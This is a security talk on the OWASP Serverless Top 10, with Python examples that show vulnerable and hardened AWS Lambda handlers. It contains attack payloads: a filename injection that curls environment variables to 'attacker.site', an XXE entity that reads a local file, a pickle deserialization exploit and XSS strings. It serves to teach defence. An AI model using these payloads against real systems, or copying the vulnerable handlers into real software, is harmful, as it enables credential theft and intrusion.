OWASP Serverless Top 10

Presentation that introduces Serverless technology and gives a glimpse of all the OWASP Serverless Top 10 vulnerabilities with code examples.

  1. Introduction to Serverless Top 10
  2. About me: Chandrapal Badshah. Security enthusiast; "build, break, build" guy; would love to talk about plants ;)
     Contact: twitter.com/@bnchandrapal, github.com/Chan9390
  3. START WITH WHY - Simon Sinek
  4. Once upon a time... (diagram: database, web server with its own CPU and memory, web application, static files)
  5. But ... (same diagram)
  6. But ... Security means maintaining and updating the operating system with security patches, WAF/firewall configuration, network monitoring, etc.
  7. CHANGED THE GAME
  8. Introduction to Microservices
  9. Introduction to Microservices: still a lot of manual work (depending on the deployment method) to scale them, and the security tasks depend on the deployment method too.
  10. Introduction to Serverless: "The phrase 'serverless' doesn't mean servers are no longer involved. It simply means that developers no longer have to think that much about them. Computing resources get used as services without having to manage around physical capabilities or limits." https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
  11. Introduction to Serverless: https://martinfowler.com/bliki/Serverless.html
  12. Cloud Providers
  13. Serverless Tools & Frameworks
  14. Who uses Serverless (AWS Lambda): https://aws.amazon.com/lambda/resources/customer-case-studies/
  15. Features of Function-as-a-Service
     ➔ Stateless functions
     ➔ Complete abstraction of the underlying servers
     ➔ Instant, scalable and event-driven
     ➔ Pay for what you use
     ➔ Free tier (AWS Lambda gives 1,000,000* requests for free every month)
     ➔ There is a default timeout
     ➔ The function guidelines (runtimes, limits, packaging) are defined by the cloud service provider
     ➔ Multiple languages supported
  16. DEMO - Deploying a Serverless App
  17. So simple, right?
  18. What if ... ?
  19. One question ?
  20. Do you think the OWASP Serverless Top 10 vulnerabilities are different from the OWASP Top 10?
  21. Do you think the OWASP Serverless Top 10 vulnerabilities are different from the OWASP Top 10?
     ● The way the apps are created is similar to that of server-based applications
     ● There's not a lot of data from organizations on how they use serverless functions in production (and the security issues they faced)
  22. Let's jump into the OWASP Serverless Top 10
  23. A1: Injection
     ● Serverless functions don't only have HTTP triggers; they are also triggered by cloud storage events, database changes, email notifications, queues, etc., so untrusted input arrives through every one of those event sources, not just through a request
     ● SQL/NoSQL injection
     ● OS command injection
     ● Code injection - the severity depends on the permissions given to the vulnerable Lambda function
  24. An example scenario: CV filtering system. The user sends a mail with a CV attached; the email reaches the server; AWS SNS sends a notification to Lambda; the Lambda function gets the mail and parses it if there is a PDF attachment.
  25. Can you see the bug?
  26. The function: (1) checks that the attachment has a file name, (2) checks that the filename ends with .pdf, (3) prepends /tmp to the filename, (4) executes the command pdftotext on that path, with the filename concatenated into the command string.
  27. Payload (to print the environment variables, which on Lambda include the function's temporary AWS credentials):
     foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
     The ';' ends the pdftotext command and the '#' turns the trailing '.pdf' into a shell comment, so the name still passes the extension check while the shell runs env and curl.
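The handler described on slides 26 and 27, reconstructed in Python as an added example (the presentation's own code is not on this page), with a hardened version beside it. `echo` stands in for `pdftotext` so the block runs without the tool installed; the attachment-name check, the /tmp prefix and the shape of the payload follow the slides, while the function and variable names and the allow-list pattern are assumptions made here.

```python
import os
import re
import subprocess

# Stand-in for the tool the slide's handler invokes (pdftotext). The injection
# works identically because the shell, not the tool, parses the command line.
TOOL = "echo"


def vulnerable_extract(filename):
    """Mirror of the slide's handler: name check, suffix check, string
    concatenation, shell execution. endswith('.pdf') is satisfied by
    'foobar;env|curl ... #.pdf' because the payload ends in '.pdf'."""
    if not filename or not filename.endswith(".pdf"):
        return None
    path = "/tmp/" + filename
    # Same as os.system(...): the shell treats ';' as a command separator and
    # '#' as the start of a comment, so the trailing '.pdf' never reaches TOOL.
    result = subprocess.run(TOOL + " " + path, shell=True,
                            capture_output=True, text=True)
    return result.stdout


# Allow-list for the attachment name (assumed policy): one path component,
# alphanumerics/underscore/hyphen only, bounded length, must end in '.pdf'.
# No '/', no '..', no shell metacharacters can get through.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,99}\.pdf")


def accepts(filename):
    """True when the name matches the allow-list (None and '' are rejected)."""
    return bool(filename) and SAFE_NAME.fullmatch(filename) is not None


def hardened_extract(filename):
    """Same job without a shell: argv list, allow-listed name, and the path
    built from basename() so the name cannot escape /tmp even if the
    allow-list is later loosened."""
    if not accepts(filename):
        raise ValueError("attachment name rejected: %r" % (filename,))
    path = os.path.join("/tmp", os.path.basename(filename))
    result = subprocess.run([TOOL, path], capture_output=True, text=True,
                            timeout=30)
    return result.stdout


if __name__ == "__main__":
    # Constructed sample names; the first has the shape of the slide's payload.
    for name in ["foobar;echo INJECTED #.pdf", "report.pdf", "../etc/passwd.pdf"]:
        print("vulnerable output:", repr(vulnerable_extract(name)))
        print("hardened accepts: ", accepts(name))
```

With the real tool the same argv-list call is `["pdftotext", path, "-"]`; the point is that the attachment name is only ever an argument, never part of a string a shell interprets.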
  28. A2: Broken Authentication
     ● Functions are stateless
     ● Multiple entry points, services, events and triggers and no continuous flow - things can get worse
     ● Common example: functions meant for internal use only are reachable by everyone
  29. A3: Sensitive Data Exposure
     ● Depends on the architecture, just like other server-based applications
     ● Common example: functions disclosing logs on some specific endpoint
  30. A bug I recently found
  31. A4: XML External Entity (XXE)
     ● The serverless function parses XML files insecurely, i.e. with external entities resolved
     ● Exploitation is not always fruitful
  32. Vulnerable code ...
  33. Vulnerable code ... Downloads the XML file from the bucket and parses it.
  34. The payload ...
  35. The result ...
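Slides 32 to 35 are screenshots that are not on the page, so what follows is an added Python example, not the presentation's code: the same XML is parsed once with external entities resolved, as the vulnerable function does, and once with the stdlib default that leaves them unresolved. The secret file, its path and the XML payload are constructed here, and `xml.sax` stands in for whatever parser the demo used.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data, i.e. the part of the document the function acts on."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_text(xml_bytes, resolve_external_entities):
    """Parse the downloaded XML and return its text content.

    resolve_external_entities=True reproduces the vulnerable configuration: the
    parser fetches whatever a SYSTEM entity points at (local file or URL) and
    splices it into the document. False is the stdlib default since Python
    3.7.1 and is the setting the hardened function keeps."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def build_payload(secret_path):
    """Attacker-supplied XML (constructed sample). The entity reads the file at
    secret_path; a file:// or http:// URL is fetched the same way."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE cv [<!ENTITY xxe SYSTEM "%s">]>\n'
        '<cv><name>&xxe;</name></cv>\n' % secret_path
    ).encode("utf-8")


def demo():
    """Runs both parser settings against the same upload. Returns
    (text seen by the vulnerable parser, text seen by the hardened parser, secret)."""
    secret = "AKIA-CONSTRUCTED-EXAMPLE-SECRET"  # stands in for credentials on disk
    with tempfile.TemporaryDirectory() as directory:
        secret_path = os.path.join(directory, "credentials")
        with open(secret_path, "w") as f:
            f.write(secret)
        payload = build_payload(secret_path)
        vulnerable = parse_text(payload, resolve_external_entities=True)
        hardened = parse_text(payload, resolve_external_entities=False)
    return vulnerable, hardened, secret


if __name__ == "__main__":
    vulnerable, hardened, secret = demo()
    print("vulnerable parser returned:", vulnerable)
    print("hardened parser returned:  ", repr(hardened))
```

Whatever the language, the check is the same: confirm the parser in use neither resolves external general entities nor loads external DTDs, and treat any XML from a bucket, queue or request as attacker-controlled.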
  36. A5: Broken Access Control
     ● Over-privileged functions
     ● If a function is allowed to access anything on the cloud account, then so is an attacker who exploits some vulnerability in it, such as code execution
  37. A6: Security Misconfiguration
     ● Not just the function itself but how the function interacts with its environment
     ● Because of the complexity introduced by the growing number of features/functions, misconfiguration is very easy
     ● Can lead to DoS/timeouts
     ● Example: public S3 buckets
  38. A7: Cross Site Scripting (XSS)
     ● The most common web bug affects serverless functions as well
     ● Mostly due to lack of input sanitization and output encoding
  39. Find the bug... (scenario): the user sends a mail; the email reaches the server; AWS SNS sends a notification to Lambda; the Lambda function gets the mail, parses it and sends the message content to the moderator dashboard
  40. Find the bug...
  41. Find the bug... The function gets the message content and sends it to the dashboard as-is.
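The dashboard side of slides 39 to 41 as an added Python example, not the presentation's code: the mail content rendered straight into HTML, beside the same rendering with context-appropriate encoding. The HTML template, the sender/body fields and the sample mail are assumptions made here.

```python
import html


def render_vulnerable(sender, body):
    """Slide 41's flow: the mail's sender and message content are pasted into
    the moderator dashboard's HTML exactly as received."""
    return '<div class="msg" title="%s"><p>%s</p></div>' % (sender, body)


def render_hardened(sender, body):
    """Encode each value for the HTML context it lands in. html.escape covers
    both the text node and the double-quoted attribute (quote=True, the
    default, turns '"' into &quot;). A value placed inside a <script> block
    or a URL needs a different encoder; better not to put untrusted data there."""
    return '<div class="msg" title="%s"><p>%s</p></div>' % (
        html.escape(sender, quote=True), html.escape(body, quote=True))


# Constructed mail content, not from the presentation: the body carries a
# classic tag injection, the sender breaks out of the title attribute instead.
SAMPLE_SENDER = 'eve@example.net" onmouseover="alert(1)'
SAMPLE_BODY = 'Please review my CV <img src=x onerror="alert(document.cookie)">'


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_SENDER, SAMPLE_BODY))
    print(render_hardened(SAMPLE_SENDER, SAMPLE_BODY))
```

The second sample is why "strip <script>" is not a fix: the sender never contains a tag, it only closes the attribute it was placed in.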
  42. A8: Insecure Deserialization
     ● Common in Python and NodeJS, but also affects Java and .NET
     ● Mostly introduced by insecure use of 3rd-party libraries
  43. Example Java payload
  44. The payload in the request ...
  45. And the result ...
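Slides 43 to 45 show a Java payload that is not on the page. This added Python example, not the presentation's code, shows the same class of bug with `pickle`, one of the Python mechanisms slide 42 has in mind, beside a loader that refuses everything outside an allow-list. The payloads and the expected record shape are constructed here; `subprocess.check_output(["echo", "pwned"])` stands in for the command an attacker would actually run.

```python
import builtins
import io
import pickle
import subprocess


class Exploit:
    """Attacker-controlled object. pickle serialises it as 'call this callable
    with these arguments' and pickle.loads performs the call while
    deserialising, before the function sees any object at all. The harmless
    echo stands in for os.system('<reverse shell>')."""

    def __reduce__(self):
        return (subprocess.check_output, (["echo", "pwned"],))


def make_malicious_payload():
    # The Exploit class itself is not stored; only the callable reference
    # (subprocess.check_output) and its arguments are, so it loads anywhere.
    return pickle.dumps(Exploit())


def make_legit_payload():
    """What the function actually expects from its event source (constructed)."""
    return pickle.dumps({"cv_id": 42, "name": "alice"})


def vulnerable_loads(data):
    """The function trusts serialised data from a queue, bucket or request body."""
    return pickle.loads(data)


SAFE_BUILTINS = {"dict", "list", "tuple", "set", "str", "int", "float", "bool"}


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list of importable names, after the recipe in the pickle docs.
    Any global the payload asks for outside the list is refused, so the
    subprocess.check_output reference above never resolves."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("forbidden global %s.%s" % (module, name))


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def restricted_loads_or_none(data):
    """The deserialised object, or None if the payload was refused."""
    try:
        return restricted_loads(data)
    except pickle.UnpicklingError:
        return None


if __name__ == "__main__":
    print("vulnerable:", vulnerable_loads(make_malicious_payload()))
    print("restricted:", restricted_loads_or_none(make_malicious_payload()))
    print("restricted, legit:", restricted_loads_or_none(make_legit_payload()))
```

The restricted unpickler is the fallback for data you cannot change the format of; where the function owns the format, a schema-checked JSON document removes the code-execution surface entirely.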
  46. A9: Using Components with Known Vulnerabilities
     ● Using dependencies that are insecure
     ● The most commonly found issue
     ● Not every vulnerability will affect serverless functions
     ● Does not always guarantee remote exploitation
  47. A10: Insufficient Logging and Monitoring
     ● Serverless auditing is even harder than for traditional web applications
     ● Since clients and event sources interact directly with the serverless functions, there is usually no network perimeter on which to place a WAF or other inline monitoring (an HTTP API behind a gateway can be fronted by one; storage, queue and notification triggers cannot)
     ● This actually helps attackers
  48. Lambda code
  49. Lambda logs
  50. Lambda logs (in case of a huge payload)
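An added example, not the presentation's code, of what a function can still do for itself when nothing sits in front of it: log a bounded fingerprint of every event instead of the event, so the huge-payload case on slide 50 neither exceeds the 256 KB CloudWatch Logs limit per log event (which would lose the line) nor floods the stream. `FakeContext`, the trigger name, the handler and the events are constructed here; on Lambda the real context object supplies `aws_request_id` and `function_name`.

```python
import hashlib
import json
import time

MAX_PREVIEW = 512  # bytes of payload kept verbatim per log line


def invocation_record(event, context, source):
    """One bounded, JSON-ready record per invocation: request id, trigger
    source, payload size and SHA-256, and a short prefix of the payload.
    The full event is never logged, yet the hash still lets a suspicious
    invocation be matched against a captured sample later."""
    raw = json.dumps(event, sort_keys=True, separators=(",", ":")).encode("utf-8")
    return {
        "ts": int(time.time()),
        "request_id": getattr(context, "aws_request_id", None),
        "function": getattr(context, "function_name", None),
        "source": source,
        "payload_bytes": len(raw),
        "payload_sha256": hashlib.sha256(raw).hexdigest(),
        "payload_preview": raw[:MAX_PREVIEW].decode("utf-8", "replace"),
        "truncated": len(raw) > MAX_PREVIEW,
    }


def logged(source):
    """Decorator for a Lambda handler: one record before the handler runs and
    one after, so a crash or a timeout still leaves the first line behind.
    Lambda forwards stdout to CloudWatch Logs, hence the print()."""
    def wrap(handler):
        def inner(event, context):
            record = invocation_record(event, context, source)
            print(json.dumps(record))
            try:
                result = handler(event, context)
            except Exception as exc:
                print(json.dumps({"request_id": record["request_id"],
                                  "status": "error", "error": repr(exc)}))
                raise
            print(json.dumps({"request_id": record["request_id"], "status": "ok"}))
            return result
        return inner
    return wrap


class FakeContext:
    """Constructed stand-in for the Lambda context object."""
    aws_request_id = "11111111-2222-3333-4444-555555555555"
    function_name = "cv-filter"


@logged("sns")
def handler(event, context):
    """Placeholder for the CV-filtering handler; counts the SNS records."""
    return {"records": len(event.get("Records", []))}


if __name__ == "__main__":
    big_event = {"Records": [{"Sns": {"Message": "A" * 300000}}]}  # constructed
    print(handler(big_event, FakeContext()))
```

A metric filter on `payload_bytes` or on `"status": "error"` then gives the alerting that a WAF would otherwise have provided, and the request id ties the two lines to the platform's own invocation logs.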
  51. Resources
     OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project
     OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project
     Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g
     Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0
     AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops
     PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
  52. Stay tuned! Damn Vulnerable Serverless App on its way
  53. Any questions?
